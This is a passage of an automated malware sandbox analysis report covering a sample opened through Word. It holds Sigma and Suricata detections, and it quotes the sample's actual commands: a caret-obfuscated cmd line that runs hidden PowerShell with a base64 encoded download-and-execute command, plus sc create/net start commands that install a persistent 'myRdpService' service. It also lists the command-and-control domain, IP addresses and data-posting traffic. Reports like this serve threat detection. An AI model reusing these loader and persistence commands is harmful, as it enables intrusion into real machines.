      Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8116, ProcessName: net.exe
      Sigma detected: New Service Creation Using Sc.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 8060, ProcessName: sc.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine|base64offset|contains: F^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8632, ParentProcessName: cmd.exe, ProcessCommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , ProcessId: 8708, ProcessName: powershell.exe
      Sigma detected: SC.EXE Query Execution
      Source: Process startedAuthor: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8244, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 1708, ProcessName: sc.exe
      Sigma detected: Start Windows Service Via Net.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8116, ProcessName: net.exe

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8708, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline", ProcessId: 8980, ProcessName: csc.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T11:31:00.937892+010028033053Unknown Traffic192.168.11.3049789104.21.86.219443TCP
      2024-11-08T11:31:45.392835+010028033053Unknown Traffic192.168.11.3049795104.21.86.219443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T11:29:31.602047+010028032742Potentially Bad Traffic192.168.11.3049765104.21.86.219443TCP
      2024-11-08T11:29:33.950439+010028032742Potentially Bad Traffic192.168.11.3049767104.21.86.219443TCP
      2024-11-08T11:29:35.875121+010028032742Potentially Bad Traffic192.168.11.3049769104.21.86.219443TCP
      2024-11-08T11:29:59.577958+010028032742Potentially Bad Traffic192.168.11.3049783104.21.86.219443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Windows\Temp\svczHost.exeReversingLabs: Detection: 15%
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49772 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.30:49789 version: TLS 1.2
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbPLP source: powershell.exe, 00000006.00000002.6986665328.00000221F3F38000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bb.pdb?|yJ! source: powershell.exe, 00000006.00000002.6986665328.00000221F3F00000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: on.pdba source: powershell.exe, 00000006.00000002.6985258380.00000221F3DDF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.6985258380.00000221F3D4E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.6986665328.00000221F3F38000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb_05 source: powershell.exe, 00000006.00000002.6986665328.00000221F3F38000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: l\System.pdbp# source: powershell.exe, 0000000A.00000002.7753000643.000001ECB3D22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: !n.pdbPv source: powershell.exe, 00000006.00000002.6957927750.000000B7C9B76000.00000004.00000010.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

      Networking

      barindex
      Potential dropper URLs found in powershell memory
      Source: powershell.exe, 00000006.00000002.6989031377.00000221F44EC000.00000004.00000020.00020000.00000000.sdmpString found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument Target"word/document.xml/></Relationships>ontentType"application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml/
      Source: powershell.exe, 00000006.00000002.6989031377.00000221F44EC000.00000004.00000020.00020000.00000000.sdmpString found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument Target"word/document.xml/></Relationships>
      Source: powershell.exe, 00000006.00000002.6989031377.00000221F44EC000.00000004.00000020.00020000.00000000.sdmpString found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/w
      Source: powershell.exe, 00000006.00000002.6989031377.00000221F44EC000.00000004.00000020.00020000.00000000.sdmpString found in memory: <cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Administrator</dc:creator><cp:keywords></cp:keywords><dc:description></dc:description><cp:lastModifiedBy>Administrator</cp:lastModifiedBy><cp:revision>2</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2024-08-10T03:38:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-05T13:30:00Z</dcterms:modified></cp:coreProperties>
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmpString found in memory: <&nbsp;&nbsp;&nbsp;"><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 8008
      Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49794
      Source: global trafficTCP traffic: 192.168.11.30:49792 -> 23.88.71.29:8000
      Source: global trafficTCP traffic: 192.168.11.30:49793 -> 206.206.126.252:8008
      Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/54 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/11 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: pn3oXTss402VH4Y/XnVBsg==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: F96qsNnVhkO0Bnq7Mo0uCQ==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: dn0h10Qbzk6QBKAyaFvAMA==Sec-WebSocket-Version: 13
      Source: Joe Sandbox ViewIP Address: 104.21.86.219 104.21.86.219
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49765 -> 104.21.86.219:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49769 -> 104.21.86.219:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49767 -> 104.21.86.219:443
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49783 -> 104.21.86.219:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49789 -> 104.21.86.219:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49795 -> 104.21.86.219:443
      Source: global trafficHTTP traffic detected: GET /JxSkX6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b98b8fdbbddfe1fc26714001dac68f55dfde6394439e7568362e53d351476f01a0d0741ebee7cb085677b1764accc0b029f3923b6e1a657607c54dee2db6106bd/Windows%20Defender/16/16/user/210 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321187377204903035f2c6edc84e1877b6a70 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: GET /file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da5e56b571757f523ab1b74f0b2fa31feffd1e9fe8161112e75692567601712fb0e25e562d6b8a48e104a3092fb281311ceea3263b30f8d001611aa592f7120974449bb2c8f98c07211ad54ea73548ef HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a4d29dc2b42a1fdfc3fcf445b5e1ec79 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: GET /file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc84cb31c99f6999cbed2bab91692ffe3feecd30f8b6cd30f04af60c8dabe34f74fc256b3f6e52efc3f21eedc161c10335c7fc04619b4334db2e7940d16a99cff437db3b2fa0fb83ecdbd3edcdfa830e9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d0439 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 85
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d0439 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 86
      Source: global trafficHTTP traffic detected: GET /file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e296229154220dabcd48c417e74866081b7c5d20c49a289c543f24eec22cbab522d3402e79738e8af51a6b4c56e1b482bb7c2375dc70d620959fecb0a13db5f7c69a828930bf4d46f7d70cd6f4f8d4a9738b8bcc2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d0439 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 62
      Source: global trafficHTTP traffic detected: GET /file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e353309644c5163adc6fb4a31548ae03ae3e92419435881eeebe7f4ae1c2626a34d7ec2fa7eb88b6aca77f088cd4d49b095045c28535df70e5ab5d0a2b5b0c8ad3e83b6c86bda9d5d720ef55b509d4734a348e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 140
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 69
      Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac1548c78ec9055a01bf495c56498955f53f6c825ee68079bbe4ffef478e9254d76abc75433b29236d6d4ad3a1ad4ad48435e9f0cbebbc164349fd84634f30e15af HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 200
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 97
      Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 64
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /JxSkX6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b98b8fdbbddfe1fc26714001dac68f55dfde6394439e7568362e53d351476f01a0d0741ebee7cb085677b1764accc0b029f3923b6e1a657607c54dee2db6106bd/Windows%20Defender/16/16/user/210 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da5e56b571757f523ab1b74f0b2fa31feffd1e9fe8161112e75692567601712fb0e25e562d6b8a48e104a3092fb281311ceea3263b30f8d001611aa592f7120974449bb2c8f98c07211ad54ea73548ef HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
